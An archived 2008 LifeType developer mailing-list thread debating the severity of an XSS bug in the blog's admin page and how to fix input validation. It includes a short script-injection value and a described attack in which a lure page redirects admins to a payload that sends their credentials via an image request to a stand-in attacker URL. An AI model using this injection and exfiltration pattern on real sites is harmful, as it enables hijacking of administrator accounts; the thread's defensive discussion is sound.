[pLog-svn] Lifetype 1.2.8 ...

Mon May 5 10:53:16 EDT 2008

the typo was <input value="%22 <script>something</script>">

On Mon, May 5, 2008 at 10:50 AM, Jon Daley <plogworld at jon.limedaley.com>
wrote:

>        I understand that XSS can do stuff, I'd just like to see a specific
> example for this particular bug.  From the example on security focus, it had
> an empty value="" in the submit tag, which I am assuming is a typo,
> otherwise I don't see how there is anything that can be done on the server
> side to fix it.
>        Can anyone make a bit of javascript that actually gets something
> interesting using this bug?  Then we can look into general purpose solutions
> for fixing it, rather than one input at a time.
>
>
> On Mon, 5 May 2008, Matt Wood wrote:
>
>  Here is a common exploitation scenario for you...
> >
> > An Attacker is targeting the lifetype.net site, he wants admin.
> >
> > He knows from emails and reading around that Oscar, Reto, Mark and Jon
> > are
> > likely to have admin on that page, so he makes a webpage on geocities or
> > google or something.
> >
> > On this webpage he has javascript (or a meta refresh tag or an HTTP 302)
> > that immediately redirects you to lifetype.net/admin.php with some
> > javascript payload utilitizing the XSS exploit.
> >
> > This javascript payload can utilize XSS to create an img tag, this img
> > tag
> > has a src of
> > http://attackpage/record.php?data=admincredentials-base64ed(orsomething)<http://attackpage/record.php?data=admincredentials-base64ed%28orsomething%29>
> > as long as the data fits in the get parameters. You could also
> > create a form and have no limit.
> >
> > Now all the attacker has to do is email each of you telling you that he
> > has
> > found a serious bug in lifetype, and he has screenshots on this page
> > http://google/blah.(html|php|jpg)<http://google/blah.%28html%7Cphp%7Cjpg%29>(depending on his level of control of the
> > site). Maybe he even puts screen shots on there so it doesn't look too
> > scary... and uses an iframe to do the actual attack. You would never
> > know
> > unless you are monitoring all your traffic through a proxy.
> >
> > XSS is ALWAYS serious.
> >
> > On Mon, May 5, 2008 at 1:00 AM, Mark Wu <markplace at gmail.com> wrote:
> >
> >       Can you post an example?  I am still not getting how
> > > > the server-side is involved. I understand that if I put
> > > > javascript on the admin's site, the javascript would have
> > > > access to stuff, but the browser is supposed to block
> > > > javascript from grabbing stuff from one site and posting it
> > > > to another, right?  So, somehow he grabs stuff via
> > > > javascript, posts it to admin.php which then posts stuff to
> > > > another site?
> > > >
> > >
> > > I have  no idea either. Reto, if you can provide an example here, that
> > > willl
> > > very helpful.
> > >
> > >       Sure, that's fine, but as far as I can tell, all inputs
> > > > would be susceptible to the same problem, so fixing one
> > > > variable isn't really a fix.
> > > >
> > >
> > > Not "all" inputs, just those inputs that we use string validator and
> > > does
> > > not filtered by htmlfilter( strip tags) or displayed without escape
> > > html
> > > special characters ...
> > >
> > > I think quite few ..
> > >
> > > Mark
> > >
> > > _______________________________________________
> > > pLog-svn mailing list
> > > pLog-svn at devel.lifetype.net
> > > http://limedaley.com/mailman/listinfo/plog-svn
> > >
> > >
> >
> --
> Jon Daley
> http://jon.limedaley.com/
>
> Truth is beautiful, without doubt; but so are lies.
> -- Ralph Waldo Emerson
>
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://limedaley.com/mailman/listinfo/plog-svn
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://limedaley.com/pipermail/plog-svn/attachments/20080505/5d7c814b/attachment-0001.htm>